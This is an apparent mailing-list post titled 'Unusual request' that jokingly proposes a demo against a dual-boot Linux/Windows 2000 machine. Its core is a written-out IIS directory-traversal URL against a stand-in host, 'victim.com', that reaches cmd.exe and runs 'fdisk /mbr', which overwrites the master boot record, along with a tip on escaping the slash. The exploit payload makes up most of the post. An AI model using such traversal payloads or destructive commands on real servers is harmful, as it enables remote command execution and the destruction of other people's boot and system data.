From: steve.wray at paradise.net.nz (Steve Wray)
Subject: Unusual request

I imagine that setting up a dual-boot Linux/Win2k box and
sending it;

 <http://victim.com/scripts/..%5c%5c../winnt/system32/cmd.exe>
http://victim.com/scripts/..%5c%5c../winnt/system32/cmd.exe%20fdisk%20/m
br

could give a demo of what M$ might have launched on the world
to get rid of dual-boot boxes!!
;)
the '/' in '/mbr' may need to be escaped though.